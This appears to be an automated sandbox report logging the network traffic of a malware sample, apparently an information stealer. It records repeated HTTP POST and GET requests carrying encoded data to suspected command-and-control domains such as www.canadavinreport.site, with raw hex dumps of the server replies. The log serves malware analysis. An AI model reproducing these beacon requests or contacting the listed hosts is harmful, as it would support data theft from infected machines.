                                                                                  Data Ascii: lH_L4=B0dCoKtIGqGciz4r89HcM1KW0uypsSfNIpPxD3poU1lsWMQA5280FIlZSoagjedSpRI51LNRGD55wTwqp5i+rN5K+eAZTMRhiBg8PVdr+FzD4QiBKYxGZFsGm/00h2M+NLPN+GssXzo3T41uzW2wDOmpe+Bs9HuvxloG58jKN9ry9yoSHRxvWakwK9oRVBPHVum3zOu/54wAokl/SAipu168jpFHGpQ5D+YJ/IbHMZ+rCkIoMWMBeO6zZLbYwkutjJD+YUirkVRazzT78MbAeqRbbMrcY0QdP38cON+wqXwLgtITnMgu18KMNH+HFzAUs1uj6IwHvXO32vA0ipP9JT2DmFOr5D7tHk8m0y4kZjwoyFgYKi9JO1S5CQqAKKNs+TpyrT2yKrGClXQs+WxiMukMKxx/yVNNeCLldLcoxsy9j/wOQi+TNUwTG/9OOPbVCeHqvX8v9WgS+mdSc5S08gKxc4/XpQTPP5MwPa7qcLG/7JPirpujdWjWtjmEJ0edEf3j/GRQ2+p+UeuO1Gtu9c/9Iuyiaam0WyMQY8kH5+NUJI1FITeCUSQ0KXo8DKGWZQFQ2bBNQ5Pyzi1YyLG3bC2nNkCyOMUtsrkTJGti4/vxeZYmmhbAzK/vvi/ynqxPQv1QWVyh3LjSV9h0rvoB83VWFWr0FbK5LiBqcXkHjBheOF0Vgw/zy16yz+bTbTvVZcrGkdwQMJeOvIhGC5rcpNkyIPqWU6wZXF+Hd7B8aFJinluG3nHBsrlVJ2t3D9v0+yP7PV1l/dViUsbwn9aUybYwAaaHxF8vREEYQnQkuT+HhJXC3q7MogksnEmHRUKY8BG6nuP6OBZijPCIeWJaEKqQINS0LsrvQfOCW4LNZoXncSqyw+vr4GGsl0sGW0cRgQNQnMKAUmbZ5a1buq+g53WM+46s4gGoomiAheIYM3bCcU5DyurSQWlauj7X8HGoyxas2m01GsrHsVftFytEKearfxvT7WcKGYF7tnBURRIISj [TRUNCATED]
                                                                                  Nov 27, 2024 01:28:25.029800892 CET1236INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:24 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66cce1df-b96"
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                  Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                  Nov 27, 2024 01:28:25.029814959 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                  Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  40192.168.2.550021161.97.142.144803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:26.563488007 CET358OUTGET /jm2l/?lH_L4=M21ir/NSFfGrmB4z/u+JMR/HgMrfgTX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyh9BQr7AsY9ps2ywsUHN31DffyA3sdKxmASYgpvofv0k0Sg==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.54248711.xyz
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:28:27.843817949 CET1236INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:27 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 2966
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: "66cce1df-b96"
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                  Nov 27, 2024 01:28:27.843839884 CET224INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                  Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                                                                                  Nov 27, 2024 01:28:27.843853951 CET1236INData Raw: 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 65 6d 3b 0a 09 09 09 09 6c 69
                                                                                  Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                                                                                  Nov 27, 2024 01:28:27.843985081 CET474INData Raw: 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 61 6e 69 6d 61 74
                                                                                  Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oops! We couldn


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.2.550022185.27.134.206803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:33.470304012 CET630OUTPOST /cvhb/ HTTP/1.1
                                                                                  Host: www.canadavinreport.site
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.canadavinreport.site
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.canadavinreport.site/cvhb/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 54 5a 56 36 69 6c 35 6c 45 71 33 6a 77 59 56 49 50 58 74 35 63 54 5a 42 63 46 72 32 6a 56 67 78 4a 6a 33 6a 42 36 55 39 77 52 69 50 44 77 6c 35 70 2b 48 64 34 2f 6a 36 4d 72 72 6a 2b 4a 67 49 42 57 36 34 6b 66 6f 76 59 46 63 4d 4f 4c 72 4c 4e 4c 6d 65 38 64 68 4e 5a 4c 78 52 72 77 55 71 30 5a 79 55 52 61 68 42 56 67 52 6d 37 37 6e 63 4d 45 42 4a 4c 44 32 57 4c 2f 56 6f 5a 6f 7a 53 4c 6f 61 30 39 55 30 62 35 49 68 42 4f 59 75 64 4c 44 34 4b 51 55 51 62 52 71 73 6b 76 61 76 2b 35 67 53 62 62 46 34 48 32 4c 74 67 44 76 53 35 4c 34 48 32 31 51 6e 42 4f 79 30 57 54 5a 6f 65 43 30 63 48 70 47 73 3d
                                                                                  Data Ascii: lH_L4=TZV6il5lEq3jwYVIPXt5cTZBcFr2jVgxJj3jB6U9wRiPDwl5p+Hd4/j6Mrrj+JgIBW64kfovYFcMOLrLNLme8dhNZLxRrwUq0ZyURahBVgRm77ncMEBJLD2WL/VoZozSLoa09U0b5IhBOYudLD4KQUQbRqskvav+5gSbbF4H2LtgDvS5L4H21QnBOy0WTZoeC0cHpGs=
                                                                                  Nov 27, 2024 01:28:34.700767994 CET1041INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:34 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 840
                                                                                  Connection: close
                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                  Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("14920d49321f67414c762f9a1fb56bb1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.2.550023185.27.134.206803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:36.129889011 CET650OUTPOST /cvhb/ HTTP/1.1
                                                                                  Host: www.canadavinreport.site
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.canadavinreport.site
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.canadavinreport.site/cvhb/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 54 5a 56 36 69 6c 35 6c 45 71 33 6a 69 72 64 49 4e 78 6c 35 51 6a 5a 43 54 6c 72 32 36 6c 67 71 4a 6a 4c 6a 42 35 59 74 73 7a 32 50 41 53 74 35 6f 37 37 64 78 76 6a 36 48 4c 72 6d 78 70 67 39 42 57 6d 47 6b 61 49 76 59 45 34 4d 4f 4a 7a 4c 4e 38 79 64 38 4e 68 50 56 72 78 50 6b 51 55 71 30 5a 79 55 52 61 46 72 56 67 4a 6d 37 4c 33 63 4d 6c 42 47 55 7a 32 4a 4d 2f 56 6f 53 49 7a 57 4c 6f 61 47 39 56 34 69 35 4b 5a 42 4f 59 2b 64 4c 57 55 4c 48 45 51 42 66 4b 74 4b 6d 61 6d 33 37 68 4b 37 63 56 42 36 70 4b 31 75 43 5a 6a 54 52 61 50 65 6d 77 4c 35 65 68 38 68 43 70 4a 33 59 58 4d 33 33 52 34 6e 5a 56 49 31 6e 59 67 43 4f 62 66 51 69 75 7a 69 6c 54 4a 55
                                                                                  Data Ascii: lH_L4=TZV6il5lEq3jirdINxl5QjZCTlr26lgqJjLjB5Ytsz2PASt5o77dxvj6HLrmxpg9BWmGkaIvYE4MOJzLN8yd8NhPVrxPkQUq0ZyURaFrVgJm7L3cMlBGUz2JM/VoSIzWLoaG9V4i5KZBOY+dLWULHEQBfKtKmam37hK7cVB6pK1uCZjTRaPemwL5eh8hCpJ3YXM33R4nZVI1nYgCObfQiuzilTJU
                                                                                  Nov 27, 2024 01:28:37.409043074 CET1041INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:37 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 840
                                                                                  Connection: close
                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                  Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("14920d49321f67414c762f9a1fb56bb1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  43192.168.2.550024185.27.134.206803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:38.800612926 CET1667OUTPOST /cvhb/ HTTP/1.1
                                                                                  Host: www.canadavinreport.site
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.canadavinreport.site
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.canadavinreport.site/cvhb/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 54 5a 56 36 69 6c 35 6c 45 71 33 6a 69 72 64 49 4e 78 6c 35 51 6a 5a 43 54 6c 72 32 36 6c 67 71 4a 6a 4c 6a 42 35 59 74 73 7a 4f 50 44 6e 68 35 70 59 54 64 72 76 6a 36 5a 37 72 6e 78 70 67 67 42 57 2b 43 6b 61 4d 2f 59 47 77 4d 4f 71 37 4c 4c 4f 4b 64 33 4e 68 50 49 62 78 4f 72 77 55 2f 30 5a 69 51 52 61 31 72 56 67 4a 6d 37 4f 37 63 46 55 42 47 50 7a 32 57 4c 2f 56 61 5a 6f 7a 2b 4c 6f 7a 78 39 56 38 74 35 37 35 42 41 63 69 64 4a 6b 73 4c 45 6b 51 48 59 4b 74 6b 6d 61 36 30 37 68 6d 52 63 56 31 45 70 4c 42 75 41 63 66 4b 4f 71 4c 6b 6b 79 44 45 55 47 45 61 57 5a 4e 5a 64 47 68 47 37 51 6f 78 46 32 77 4b 6f 6f 52 48 45 4a 2f 5a 68 37 50 51 68 55 73 62 47 30 2f 56 35 6e 37 32 4c 53 61 69 50 32 64 32 43 6b 4f 46 73 6e 42 4f 62 63 32 4d 51 6e 70 34 62 41 4a 52 5a 70 50 79 66 34 52 32 50 79 74 66 74 6b 36 62 76 65 31 43 52 67 51 72 35 34 55 64 56 51 58 65 4f 69 64 36 44 45 63 47 57 77 30 45 4e 65 4d 37 67 49 4b 35 63 50 6a 35 39 42 2b 75 5a 56 4e 38 36 59 2f 72 47 36 34 4a 46 6e 7a 6e [TRUNCATED]
                                                                                  Data Ascii: lH_L4=TZV6il5lEq3jirdINxl5QjZCTlr26lgqJjLjB5YtszOPDnh5pYTdrvj6Z7rnxpggBW+CkaM/YGwMOq7LLOKd3NhPIbxOrwU/0ZiQRa1rVgJm7O7cFUBGPz2WL/VaZoz+Lozx9V8t575BAcidJksLEkQHYKtkma607hmRcV1EpLBuAcfKOqLkkyDEUGEaWZNZdGhG7QoxF2wKooRHEJ/Zh7PQhUsbG0/V5n72LSaiP2d2CkOFsnBObc2MQnp4bAJRZpPyf4R2Pytftk6bve1CRgQr54UdVQXeOid6DEcGWw0ENeM7gIK5cPj59B+uZVN86Y/rG64JFnznfXWIBZG6NCkAElY0AJSUFmEVEJtjwVW3cQcGJE2foKnoDRM4b2hI/uT0zzGMg1XjBy+0kVzzITiToNFgV9aIA4qrLXMIxNURHEsloShTuCl7LRwzoUN6jvUG9sBt22jIIm3RjK8frdZjG/go1myIBT4JR/AjS0BxqalVkBNE3qns2PrME0fIp507IcMSqcxft/xru9lfAjNrBCUNzvCbl2bzeAPEJIuJQiturRqjTEtmgIMJXOpfJ+ljqPjclgN259pGFJTHx7vGjc+jJ5ia0cPnXP2Wq2484tBy/OT8P/qQctWNjThfb863vr2OAMCecoTeZoSP5boQ2EoTYxHesJ7kxRi0SvvPn/GCimZZReBibYHB/w4P/n3oURpEY+J7DXqGSEoZhkjfLP8tx+lvUbZk4qojkURegwWsHSqQWb3L1Kz5w9/Ra8o0mZSDTLEFHeI1+ale25zxH8+doJeHzm/CfUR2P0J945LeipPFfSVn6ceK48MHQFB1ux6P6HlDssEsaxYSgzlXUoe2Av5jAIRQ62p91rf2tXf4YVfGCcrk9eXQQtfhWa5SiUuSwdfebMv5b199hec9qH4cmM7LLtTAMXNcvdQh/JOgibdjsXYwAbr4SUHDd8FtkyQJKJMfBhLLku4Hj2BXX/qRqoiJ+lHOK7AZh9p6h3 [TRUNCATED]
                                                                                  Nov 27, 2024 01:28:40.081840038 CET1041INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:39 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 840
                                                                                  Connection: close
                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                  Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("14920d49321f67414c762f9a1fb56bb1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  44192.168.2.550025185.27.134.206803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:41.583425999 CET366OUTGET /cvhb/?lH_L4=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSex8cscvdTrTgngauHU4xbCBdC3sDNHF9YUQ2vDY1OdPiGaw==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.canadavinreport.site
                                                                                  Accept: */*
